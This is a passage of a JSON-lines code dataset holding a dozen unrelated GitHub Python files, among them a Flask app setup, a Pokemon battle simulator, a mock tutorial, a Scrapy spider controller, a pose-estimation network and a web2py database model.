[app.config[f'UNSEAL_VAULT_KEY{i}'] for i in range(1, 6)]\n vault_client.unseal_multi(filter(None, keys))\n\n\ndef configure_database(app):\n @app.teardown_request\n def shutdown_session(exception=None):\n db.session.remove()\n\n @app.before_first_request\n def create_default():\n db.create_all()\n create_default_users()\n create_default_parameters()\n create_default_services()\n if app.config['CREATE_EXAMPLES']:\n create_default_examples(app)\n create_default_pools()\n\n\ndef configure_errors(app):\n @login_manager.unauthorized_handler\n def unauthorized_handler():\n return render_template('errors/page_403.html'), 403\n\n @app.errorhandler(403)\n def authorization_required(error):\n return render_template('errors/page_403.html'), 403\n\n @app.errorhandler(404)\n def not_found_error(error):\n return render_template('errors/page_404.html'), 404\n\n\ndef configure_logs(app):\n basicConfig(\n level=DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d-%Y %H:%M:%S',\n handlers=[\n RotatingFileHandler(\n app.path / 'logs' / 'enms.log',\n maxBytes=20000000,\n backupCount=10\n ),\n StreamHandler()\n ]\n )\n\n\ndef create_app(path, config):\n app = Flask(__name__, static_folder='base/static')\n app.config.from_object(config)\n app.production = not app.config['DEBUG']\n app.path = path\n register_extensions(app)\n register_blueprints(app)\n configure_login_manager(app)\n configure_database(app)\n configure_rest_api(app)\n configure_logs(app)\n configure_errors(app)\n apply_themes(app)\n if use_vault:\n configure_vault_client(app)\n info('eNMS starting')\n return 
app\n","repo_name":"mwallraf/eNMS","sub_path":"eNMS/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"28774481972","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pwlf\n\nx = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], dtype=float)\ny = np.array([0, 12.05, 0, 12.66, 40.0, \n 0, 0, 0, 0, 5.1,\n 0, 0, 3.51, 0, 0])\n\nmy_pwlf = pwlf.PiecewiseLinFit(x, y)\nbreaks = my_pwlf.fit(13)\nprint(breaks)\n\nx_hat = np.linspace(x.min(), x.max(), 100)\ny_hat = my_pwlf.predict(x_hat)\n\nplt.figure()\nplt.plot(x, y, 'o')\nplt.plot(x_hat, y_hat, '-')\nplt.show()\n","repo_name":"Cuda-Chen/segmented-regression-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20453262955","text":"from random import randrange\r\n# 252 Atk Jolly Excadrill vs 252HP 88Def Careful(+SpD-SpA) Mandibuzz\r\n\r\n#Can Mandibuzz switch in Excadrill(no Swords Dance, no Rock Slide) with more than half HP left?\r\n#Excadrill always uses Iron Head\r\n#Mandibuzz switch in at first turn\r\n\r\n#Result:\r\n#try 100000, Mandibuzz wins 41364\r\n#Mandibuzz can stall Excadrill with more than half HP by the chance of about 41%\r\n\r\nHead = [118, 120, 121, 123, 124, 126, 127, 129, 130, 132, 133, 135, 136, 138, 139, 141]\r\nHeadCT = [178, 181, 183, 186, 187, 189, 192, 193, 196, 198, 199, 202, 204, 207, 208, 211]\r\nFoul=[240, 243, 246, 249, 252, 255, 256, 259, 262, 265, 268, 271, 274, 277, 280, 283]\r\nFoulCT=[360, 364, 369, 373, 376, 381, 385, 390, 394, 399, 402, 406, 411, 415, 420, 424]\r\n\r\n#ExcaHP=361,MandHP=424\r\n\r\n\r\n############### Assumptions: Before Head pp goes to 0 \r\n\r\ndef MandStrategy(MandHP):\r\n if MandHP<=424/2+130:\r\n return 1#Roost if HP<=50% after this attack\r\n else:\r\n return 2#Foul Play if HP\r\n\r\n#f=open(\"Exca_vs_Mand.csv\",'w')\r\nMandWin = 0\r\nfor i in range(10):#Game loop\r\n #print('Round %d'%(i+1))\r\n ExcaHP,MandHP=361,424\r\n #Take a hit when switch in\r\n roll=randrange(0, 16)\r\n if randrange(1, 25) != 1:\r\n dam=Head[roll]\r\n else:\r\n dam=HeadCT[roll]\r\n MandHP = MandHP - dam\r\n #print('Excadrill used Iron Head!\\nMandibuzz HP %d to %d, loses %.2f%%\\n'%(MandHP+dam,MandHP,100*dam/424))\r\n for t in range(24):#Turn loop. Iron Head PP=24\r\n #print('Turn %d'%(t+1))\r\n MandStrgy=MandStrategy(MandHP)\r\n roll=randrange(0, 16)\r\n if randrange(1, 25) != 1:\r\n dam=Head[roll]\r\n else:\r\n dam=HeadCT[roll]\r\n MandHP = MandHP - dam\r\n #print('Excadrill used Iron Head!\\nMandibuzz HP %d to %d, loses %.2f%%\\n'%(MandHP+dam,MandHP,100*dam/424))\r\n if MandHP<1:\r\n #print('Mandibuzz Fainted! Excadrill HP %d\\n'%ExcaHP)\r\n break\r\n if randrange(0,10)<3:\r\n #print('Mandibuzz Flinched!\\n')\r\n continue\r\n else:\r\n if MandStrgy == 1:\r\n rec=min(MandHP + 212, 424)-MandHP\r\n MandHP = MandHP+rec\r\n #print('Mandibuzz used Roost! HP %d to %d, gains %.2f%%\\n'%(MandHP-rec,MandHP,100*rec/424))\r\n else: \r\n roll=randrange(0, 16)\r\n if randrange(1, 25) != 1:\r\n dam=Foul[roll]\r\n else:\r\n dam=FoulCT[roll]\r\n ExcaHP = ExcaHP-dam\r\n #print('Mandibuzz used Foul Play!\\nExcadrill HP %d to %d, loses %.2f%%\\n'%(ExcaHP+dam,ExcaHP,100*dam/361))\r\n if ExcaHP<1:\r\n #print('Excadrill Fainted! 
Mandibuzz HP %d\\n'%MandHP)\r\n                        MandWin=MandWin+1\r\n                        break\r\n                continue\r\n        #print('Turn 24 over')\r\n        MandWin=MandWin+1\r\n        \r\n    #f.write(str(MandWin)+'\\n')\r\nprint(MandWin)\r\n\r\n","repo_name":"wlsdx/Simple-PM-Simulator","sub_path":"Excadrill_Mandibuzz.py","file_name":"Excadrill_Mandibuzz.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8662971347","text":"# Python Test Mock\n# unittest.mock - mock object library\n# unittest.mock is a library for testing in Python.\n# It allows you to replace parts of your system under test with mock objects and make assertions about how they have been used.\n# unittest.mock provides a core Mock class removing the need to create a host of stubs throughout your test suite.\n# After performing an action, you can make assertions about which methods / attributes were used and arguments they were called with.\n# You can also specify return values and set needed attributes in the normal way.\n# \n# Additionally, mock provides a patch() decorator that handles patching module and class level attributes within the scope of a test, along with sentinel\n# for creating unique objects.\n# \n# Mock is very easy to use and is designed for use with unittest. Mock is based on the 'action -> assertion' pattern instead of 'record -> replay' used by\n# many mocking frameworks.\n#\n\n#\n# Mocking imports with patch.dict\n# One situation where mocking can be hard is where you have a local import inside a function.\n# These are harder to mock because they aren't using an object from the module namespace that we can patch out.\n# You can use patch.dict() to temporarily put a mock in place in sys.modules.\n#\n# Any imports whilst this patch is active will fetch the mock.\n# When the patch is complete (the decorated function exits, the with statement body is complete or patcher.stop() is called) then whatever was there\n# previously will be restored safely.\n#\n\n# \n# Here's an example that mocks out the 'fooble' module.\n# \n\nimport sys\nfrom unittest.mock import Mock, patch\n\nmock = Mock()\n\nwith patch.dict('sys.modules', {'fooble': mock}):\n    import fooble\n\n    fooble.blob()\n\n# OUTPUT: '<Mock name='mock.blob()' id='...'>'\n\nassert 'fooble' not in sys.modules\n\nmock.blob.assert_called_once_with()\n\n# \n# As you can see the import fooble succeeds, but on exit there is no 'fooble' left in sys.modules.\n# \n# This also works for the from module import name form:\n# \n\nmock = Mock()\n\nwith patch.dict('sys.modules', {'fooble': mock}):\n    from fooble import blob\n\n    blob.blip()\n\n# OUTPUT: '<Mock name='mock.blob.blip()' id='...'>'\n\nmock.blob.blip.assert_called_once_with()\n\n# \n# With slightly more work you can also mock package imports:\n# \n\nmock = Mock()\nmodules = {'package': mock, 'package.module': mock.module}\n\nwith patch.dict('sys.modules', modules):\n    from package.module import fooble\n\n    fooble()\n\n# OUTPUT: '<Mock name='mock.module.fooble()' id='...'>'\n\nmock.module.fooble.assert_called_once_with()\n","repo_name":"syurskyi/Python_Topics","sub_path":"115_testing/examples/Github/_Level_1/Python_Unittest_Suite-master/Python_Test_Mock_Imports_With_Patch_Dict( ).py","file_name":"Python_Test_Mock_Imports_With_Patch_Dict( ).py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1528749722","text":"# Step 1: Split the input and check if they satisfy all rules\r\n# Step 2: Arrange the input to be displayed into viewer screen. There will be 3 or 4 lines. 
Note where the operand should be put, as the width of one set depends on 2 + maximum length of the two input numbers\r\n# Step 3: Calculate optionally and display the answers too. Use join with empty strings of 4 white spaces to make it align with the above lines.\r\n\r\ndef arithmetic_arranger(problems, show_Answers=False):\r\n\r\n    # Step 1\r\n    #Check for number of problems\r\n    if len(problems) > 5:\r\n        return \"Error: Too many problems.\"\r\n\r\n    #Check for valid operators: only '+' and '-' are accepted\r\n    #Split the inputs, they are first_number, operator, and second_number\r\n    #Arrange them to prepare for display. Use a list.\r\n    arranged_problems = []\r\n    for problem in problems: \r\n        firstNum, operator, secondNum = problem.split()\r\n        \r\n        if operator not in ('+', '-'):\r\n            return \"Error: Operator must be '+' or '-'.\"\r\n\r\n        if not firstNum.isdigit() or not secondNum.isdigit():\r\n            return \"Error: Numbers must only contain digits.\"\r\n\r\n        if len(firstNum) > 4 or len(secondNum) > 4:\r\n            return \"Error: Numbers cannot be more than four digits.\"\r\n\r\n        #If the input reaches here, it means it is a valid input and we will append them into our list, taking note of the triplets tuple data that we are dealing with.\r\n        arranged_problems.append((firstNum, operator, secondNum)) #3-Tuple\r\n\r\n    # Step 2: Arrange the problems\r\n    firstLine = []\r\n    secondLine = []\r\n    dashLine = []\r\n    answerLine = []\r\n\r\n    #This is arranging per individual problem\r\n    for firstNum, operator, secondNum in arranged_problems:\r\n        width = max(len(firstNum), len(secondNum)) + 2 #As according to rule\r\n        firstLine.append(firstNum.rjust(width)) #White space \r\n        secondLine.append(operator + secondNum.rjust(width - 1, ' ')) #Fillchar = ' ' to fill in with whitespace between operand and second number\r\n        dashLine.append('-' * width) #Number of - is according to problem length\r\n        #Optional calculation for answer\r\n        if show_Answers:\r\n            answer = str(eval(firstNum + operator + secondNum)) #Directly parse and calculate result, make it back to a String afterwards.\r\n            answerLine.append(answer.rjust(width))\r\n\r\n\r\n    # Step 3: Display answers optionally\r\n    if show_Answers:\r\n        return '    '.join(firstLine) + '\\n' + '    '.join(secondLine) + '\\n' + '    '.join(dashLine) + '\\n' + '    '.join(answerLine)\r\n    else:\r\n        return '    '.join(firstLine) + '\\n' + '    '.join(secondLine) + '\\n' + '    '.join(dashLine)\r\n    ","repo_name":"freddychenyouren2/python-practice-1","sub_path":"Arithmetic_Formatter/arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73489340644","text":"\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n\nclass Event(models.Model):\n    title = models.CharField(max_length=200, null=True)\n    location = models.CharField(max_length=200, null=True)\n    date = models.DateTimeField(auto_now_add=False)\n\n    def __str__(self):\n        return self.title\n\n\nclass User(AbstractUser):\n    is_Paradym = models.BooleanField('Is Paradym', default=False)\n    is_ThirdParty = models.BooleanField('Is ThirdParty', default=False)\n    is_Admin = models.BooleanField('Is Admin', default=False)","repo_name":"lAmNumberSeven/mww-main","sub_path":"ProjectSite/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40522295879","text":"from 
__future__ import print_function\nfrom hashlib import md5\nfrom re import search\n\nkey = raw_input(\"Input: \")\n\nanswers = {\n    '0'*5: None,\n    '0'*6: None,\n}\nanswers_remaining = len(answers)\ncount = 1\nwhile answers_remaining:\n    r = search(r\"^000000?\", md5(\"%s%d\" % (key, count)).hexdigest())\n\n    if r and not answers[r.group()]:\n        answers[r.group()] = count\n        answers_remaining -= 1\n\n    count += 1\n\nprint(\"Answer (part1): %d\" % answers['0'*5])\nprint(\"Answer (part2): %d\" % answers['0'*6])\n","repo_name":"rossengeorgiev/adventofcode","sub_path":"2015/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34094998091","text":"from abc import ABC, abstractmethod\nimport logging\nimport os\nimport sys\n\nfrom twisted.python.failure import Failure\nfrom twisted.internet import defer\nfrom scrapy.utils.defer import deferred_from_coro\n\nfrom MovieCollect.custom.db_importer import code_cacher\nfrom MovieCollect.custom.utils.exceptions import SpiderExistError, SpiderNotRunningError\nfrom MovieCollect.custom.utils.misc import delete_dir\n\nlogger = logging.getLogger(__name__)\n\nclass Worker(ABC):\n    def __init__(self, crawlerprocess):\n        self.crawlerprocess = crawlerprocess\n        self.spider_mongo = crawlerprocess.spider_mongo\n\n    @abstractmethod\n    def check_status(self):\n        pass\n\n    @abstractmethod\n    def change_status(spiders):\n        pass\n\nclass CheckCrawlerRunningMixin:\n    def check_crawler_running(self, spidername):\n        if spidername not in self.crawlerprocess.running_crawlers:\n            raise SpiderNotRunningError(f'Spider {spidername} is not found in running_crawlers.')\n        elif self.crawlerprocess.running_crawlers[spidername].terminate or not self.crawlerprocess.running_crawlers[spidername].crawling:\n            raise SpiderNotRunningError(f'Spider {spidername} is terminating.')\n\n\nclass start(Worker):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.spiderloader = self.crawlerprocess.spider_loader\n        self.settings = self.crawlerprocess.settings\n\n    @defer.inlineCallbacks\n    def check_status(self, spidername):\n        spidermodule_name = self.spiderloader.get_spidermodule_name(spidername)\n        if spidermodule_name in sys.modules or spidername in self.crawlerprocess.running_crawlers:\n            raise SpiderExistError(f'Spider: {spidername} is already imported or running.')\n        yield deferred_from_coro(self.spiderloader.preload(spidername))\n\n\n    @defer.inlineCallbacks\n    def change_status(self, spidername):\n        from MovieCollect.custom.crawler import AutoCrawler\n\n        spider = self.spiderloader.load(spidername)\n        crawler = AutoCrawler(spider, self.settings)\n        crawl_defer = crawler.crawl()\n\n        @defer.inlineCallbacks\n        def _done(result):\n            if isinstance(result, Failure):\n                status = 'error'\n                message = f'Error occurred while running spider: {spidername}, error msg: {result.getTraceback()}'\n                LEVEL = logging.ERROR\n            elif crawler.terminate:\n                status = 'has_terminated'\n                message = f'Spider: {spidername} has been terminated'\n                LEVEL = logging.INFO\n            else:\n                status = 'finished'\n                message = f'Finished crawling spider: {spidername}.'\n                LEVEL = logging.INFO\n            del self.crawlerprocess.running_crawlers[spidername]\n            self.crawlerprocess._active.discard(crawl_defer)\n            logger.log(LEVEL, message)\n            yield deferred_from_coro(self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':status, 'comment':message}}, upsert=False))\n            return result\n\n        if getattr(crawl_defer, 
'result', None) is not None and issubclass(crawl_defer.result.type, Exception):\n            logger.error(f'Error occurred when trying to start spider: {spidername}, error msg: {crawl_defer.result.getTraceback()}')\n            yield deferred_from_coro(self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'error', 'comment':crawl_defer.result.getTraceback()}}, upsert=False))\n        else:\n            message = f'Running spider: {spidername}.'\n            self.crawlerprocess.running_crawlers[spidername] = crawler\n            self.crawlerprocess._active.add(crawl_defer)\n            logger.info(message)\n            crawl_defer.addBoth(_done)\n            yield deferred_from_coro(self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'running', 'comment':message}}, upsert=False))\n\n    \nclass terminate(CheckCrawlerRunningMixin, Worker):\n    def check_status(self, spidername):\n        self.check_crawler_running(spidername)\n\n    @defer.inlineCallbacks\n    def change_status(self, spidername):\n        yield self.crawlerprocess.running_crawlers[spidername].stop()\n        logger.info(f'Spider: {spidername} has been terminated')\n\n\nclass pause(CheckCrawlerRunningMixin, Worker):\n    def check_status(self, spidername):\n        self.check_crawler_running(spidername)\n        if self.crawlerprocess.running_crawlers[spidername].engine.paused:\n            raise SpiderNotRunningError(f'Spider: {spidername} is paused')\n\n    async def change_status(self, spidername):\n        message = f'Spider: {spidername} has been paused'\n        self.crawlerprocess.running_crawlers[spidername].engine.pause()\n        logger.info(message)\n        await self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'has_paused', 'comment':message}}, upsert=False)\n\n\nclass resume(CheckCrawlerRunningMixin, Worker):\n    def check_status(self, spidername):\n        super().check_crawler_running(spidername)\n        if not self.crawlerprocess.running_crawlers[spidername].engine.paused:\n            raise SpiderNotRunningError(f'Spider: {spidername} is not paused')\n\n    async def change_status(self, spidername):\n        message = f'Spider: {spidername} has been resumed'\n        self.crawlerprocess.running_crawlers[spidername].engine.unpause()\n        logger.info(message)\n        await self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'running', 'comment':message}}, upsert=False)\n\n\nclass restart(start):\n    @defer.inlineCallbacks\n    def check_status(self, spidername):\n        if spidername in self.crawlerprocess.running_crawlers:\n            raise SpiderExistError(f'Spider: {spidername} is running.')\n        yield deferred_from_coro(self.spiderloader.preload(spidername))\n    \n    @defer.inlineCallbacks\n    def change_status(self, spidername):\n        spider_log_dir = os.path.join(self.settings.get('SPIDER_LOG_DIR'), spidername)\n        spider_post_dir = os.path.join(self.settings.get('IMAGES_STORE'), spidername)\n        delete_dir(spider_log_dir)\n        delete_dir(spider_post_dir)\n        yield deferred_from_coro(self.spider_mongo.coll_movie_delete_many({'spidername':spidername}))\n        logger.info(f'Spider: {spidername} is restarting')\n        yield super().change_status(spidername)\n\n\nclass delete(Worker):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.spiderloader = self.crawlerprocess.spider_loader\n        self.settings = self.crawlerprocess.settings\n\n    def check_status(self, spidername):\n        if spidername in self.crawlerprocess.running_crawlers:\n            raise SpiderExistError(f'Spider: {spidername} is running.')\n\n    async def change_status(self, spidername):\n        message = f'Spider: {spidername} has been deleted'\n        spidermodule_name = 
self.spiderloader.get_spidermodule_name(spidername)\n if spidermodule_name in sys.modules:\n del sys.modules[spidermodule_name]\n code_cacher.pop(spidername, None)\n spider_log_dir = os.path.join(self.settings.get('SPIDER_LOG_DIR'), spidername)\n spider_post_dir = os.path.join(self.settings.get('IMAGES_STORE'), spidername)\n delete_dir(spider_log_dir)\n delete_dir(spider_post_dir)\n await self.spider_mongo.coll_movie_delete_many({'spidername':spidername})\n logger.info(message)\n await self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'has_deleted', 'comment':message}}, upsert=False)\n \n\n","repo_name":"chizuo53/MovieCollect","sub_path":"MovieCollect/custom/performer.py","file_name":"performer.py","file_ext":"py","file_size_in_byte":7666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15345926647","text":"from torch import nn\nimport torch\n\nPool = nn.MaxPool2d\n\ndef batchnorm(x):\n return nn.BatchNorm2d(x.size()[1])(x)\n\nclass Conv(nn.Module):\n def __init__(self, inp_dim, out_dim, kernel_size=3, stride = 1, bn = False, relu = True):\n super(Conv, self).__init__()\n self.inp_dim = inp_dim\n self.conv = nn.Conv2d(inp_dim, out_dim, kernel_size, stride, padding=(kernel_size-1)//2, bias=True)\n self.relu = None\n self.bn = None\n if relu:\n self.relu = nn.ReLU()\n if bn:\n self.bn = nn.BatchNorm2d(out_dim)\n\n def forward(self, x):\n assert x.size()[1] == self.inp_dim, \"{} {}\".format(x.size()[1], self.inp_dim)\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\n \nclass Residual(nn.Module):\n def __init__(self, inp_dim, out_dim):\n super(Residual, self).__init__()\n self.relu = nn.ReLU()\n self.bn1 = nn.BatchNorm2d(inp_dim)\n self.conv1 = Conv(inp_dim, int(out_dim/2), 1, relu=False)\n self.bn2 = nn.BatchNorm2d(int(out_dim/2))\n self.conv2 = Conv(int(out_dim/2), int(out_dim/2), 3, relu=False)\n self.bn3 = nn.BatchNorm2d(int(out_dim/2))\n self.conv3 = Conv(int(out_dim/2), out_dim, 1, relu=False)\n self.skip_layer = Conv(inp_dim, out_dim, 1, relu=False)\n if inp_dim == out_dim:\n self.need_skip = False\n else:\n self.need_skip = True\n \n def forward(self, x):\n if self.need_skip:\n residual = self.skip_layer(x)\n else:\n residual = x\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn3(out)\n out = self.relu(out)\n out = self.conv3(out)\n out += residual\n return out \n\nclass Hourglass(nn.Module):\n def __init__(self, n, f, bn=None, increase=0):\n super(Hourglass, self).__init__()\n nf = f + increase\n self.up1 = Residual(f, f)\n # Lower branch\n self.pool1 = Pool(2, 2)\n self.low1 = Residual(f, nf)\n self.n = n\n # Recursive hourglass\n if self.n > 1:\n self.low2 = Hourglass(n-1, nf, bn=bn)\n else:\n self.low2 = Residual(nf, nf)\n self.low3 = Residual(nf, f)\n self.up2 = nn.Upsample(scale_factor=2, mode='nearest')\n\n def forward(self, x):\n up1 = self.up1(x)\n pool1 = self.pool1(x)\n low1 = self.low1(pool1)\n low2 = self.low2(low1)\n low3 = self.low3(low2)\n up2 = self.up2(low3)\n return up1 + up2\n\nclass UnFlatten(nn.Module):\n def forward(self, input):\n return input.view(-1, 256, 4, 4)\n\nclass Merge(nn.Module):\n def __init__(self, x_dim, y_dim):\n super(Merge, self).__init__()\n self.conv = Conv(x_dim, y_dim, 1, relu=False, bn=False)\n\n def forward(self, x):\n return self.conv(x)\n \nclass PoseNet(nn.Module):\n def 
__init__(self, nstack, inp_dim, oup_dim, bn=False, increase=0, **kwargs):\n super(PoseNet, self).__init__()\n \n self.nstack = nstack\n self.pre = nn.Sequential(\n Conv(1, 64, 7, 2, bn=True, relu=True),\n Residual(64, 128),\n Pool(2, 2),\n Residual(128, 128),\n Residual(128, inp_dim)\n )\n \n self.hgs = nn.ModuleList( [\n nn.Sequential(\n Hourglass(4, inp_dim, bn, increase),\n ) for i in range(nstack)] )\n \n self.features = nn.ModuleList( [\n nn.Sequential(\n Residual(inp_dim, inp_dim),\n Conv(inp_dim, inp_dim, 1, bn=True, relu=True)\n ) for i in range(nstack)] )\n \n self.outs = nn.ModuleList( [Conv(inp_dim, oup_dim, 1, relu=False, bn=False) for i in range(nstack)] )\n self.merge_features = nn.ModuleList( [Merge(inp_dim, inp_dim) for i in range(nstack-1)] )\n self.merge_preds = nn.ModuleList( [Merge(oup_dim, inp_dim) for i in range(nstack-1)] )\n self.nstack = nstack\n\n def forward(self, imgs):\n ## our posenet\n x = self.pre(imgs)\n combined_hm_preds = []\n feats = []\n for i in range(self.nstack):\n hg = self.hgs[i](x)\n feature = self.features[i](hg)\n preds = self.outs[i](feature)\n # feat = self.feat_kernel(feature)\n feats.append(feature)\n combined_hm_preds.append(preds)\n if i < self.nstack - 1:\n x = x + self.merge_preds[i](preds) + self.merge_features[i](feature)\n return torch.stack(combined_hm_preds, 1), torch.stack(feats, 1)\n","repo_name":"MohamedAfham/CD_HPE","sub_path":"models/stacked_hg.py","file_name":"stacked_hg.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"39295510613","text":"from models.Car import Car\r\nfrom models.Review import Review\r\nfrom servcies.ServiceBase import ServiceBase\r\n\r\nall_cars = \"select id, make, name, year, image from cars\"\r\n\r\n\r\nclass CarService(ServiceBase):\r\n\r\n def show_cars(self):\r\n \"\"\"\r\n show list of cars\r\n \"\"\"\r\n c = self.db.cursor()\r\n c.execute(all_cars)\r\n rows = c.fetchall()\r\n # imperative style\r\n # cars = []\r\n # for row in rows:\r\n # cars.append(Car(row[0], row[1], row[2], row[3], row[4]))\r\n\r\n # functional style\r\n return map(lambda row: Car(row[0], row[1], row[2], row[3], row[4]), rows)\r\n\r\n def get_car_details(self, car_id):\r\n self.connect()\r\n c_id = int(car_id)\r\n c = self.db.cursor()\r\n query = f\"\"\"select c.id, c.name, r.user_id, r.review, u.name from cars c\r\n left join reviews r on c.id = r.car_id\r\n left JOIN users u on u.id = r.user_id where c.id = {c_id} \"\"\"\r\n c.execute(query)\r\n out = c.fetchall()\r\n first_row = out[0]\r\n car = Car(_id=first_row[0], name=first_row[1], make='', image='', year=0000)\r\n reviews = list(map(lambda row: Review(row[2], c_id, row[3], user_name=row[4]), out))\r\n c.close()\r\n return car, list(filter(None, reviews))\r\n","repo_name":"ubaeida/Cars-Review","sub_path":"servcies/car_service.py","file_name":"car_service.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71579643686","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n'''\n__title__ = ''\n__author__ = 'dcx'\n__mtime__ = '2019/10/5'\n# code is far away from bugs with the god\n'''\n\n\nclass Person:\n def __init__(self,name:str,age:int):\n params = ((name,str),(age,int))\n if not self.checkdata(params):\n raise TypeError\n print(\"OK\")\n self.name = name\n self.age = age\n\n def checkdata(self,params):\n for k,v in params:\n if not isinstance(k,v):\n return False\n 
return True\n\n\np1 = Person(\"dingcx\",12)\n#p2 = Person(\"dingcx\",'12')\n\n\n# What if we implement the same type check with a descriptor?\nclass TypeCheck:\n    def __init__(self,name,type):\n        self.name = name\n        self.type = type\n\n    def __get__(self, instance, owner):\n        if instance is not None:\n            return instance.__dict__[self.name]\n        return self\n\n    def __set__(self, instance, value):\n        if not isinstance(value,self.type):\n            raise TypeError\n        instance.__dict__[self.name] = value\n\n\nclass Human:\n    name = TypeCheck('name',str)\n    age = TypeCheck('age',int)\n\n    def __init__(self,name:str,age:int):\n\n        self.name = name\n        self.age = age\n\n\nh = Human('dingcx',12)\nprint(\"h's __dict__ --->\",h.__dict__)\nprint(h.name,h.age)\n\n\n\n\nd = None\nprint(isinstance(d,type(None)))# why isn't None itself a type here?\n\n\n","repo_name":"dingcx/pybase_old","sub_path":"oop/oop12-描述器3.py","file_name":"oop12-描述器3.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37827591065","text":"# -*- coding: utf-8 -*-\n#########################################################################\n\n## if SSL/HTTPS is properly configured and you want all HTTP requests to\n## be redirected to HTTPS, uncomment the line below:\n# request.requires_https()\n\nimport dbaccess as dba\ndb = DAL(dba.database_uri, migrate=False)\n\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\n\nauth = Auth(db)\n# add extra fields not defined by Auth :\nauth.settings.extra_fields['auth_user'] = [Field('username'), Field('phone_number')]\nauth.define_tables(migrate=False, username=True)\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\n#auth.define_tables(username=False, signature=False)\n\n## configure email\nmail = auth.settings.mailer\nmail.settings.server = dba.mail_server\nmail.settings.sender = dba.mail_sender\nmail.settings.login = dba.mail_login\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = True\nauth.settings.reset_password_requires_verification = True\nauth.settings.create_user_groups = False\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth, filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n##   'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more 
options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n\ndb.define_table('device',\n Field('MACAddress','string'),\n Field('SerialNo','string'),\n Field('UMTagNo','string'),\n Field('Make','string'),\n Field('Model','string'),\n Field('IPAddress','string'),\n Field('RoomNum','string'),\n Field('FWVer','string'),\n Field('LoginUser','string'),\n Field('LoginPW','string'),\n Field('Status','string'),\n Field('Site','integer'),\n primarykey=['MACAddress'])\n\n#--------\ndb.define_table('device_log',\n Field('LogID','integer'),\n Field('DeviceID','string'),\n Field('Tag','string'),\n Field('LogInfo','text'),\n Field('LogDateTime','datetime'),\n Field('CritVals','text'),\n primarykey=['LogID'])\n\n#--------\ndb.define_table('engineer_info',\n Field('Person','integer'),\n Field('SID','integer'),\n Field('ContRenewDate','date'),\n primarykey=['Person', 'SID'])\n\n#--------\ndb.define_table('lease',\n Field('LeaseID','integer'),\n Field('ContractNum','string'),\n Field('RenewalDate','date'),\n Field('Contact','string'),\n Field('Phone','string'),\n Field('Address','string'),\n Field('Site','integer'),\n Field('LEASEcol','string'),\n 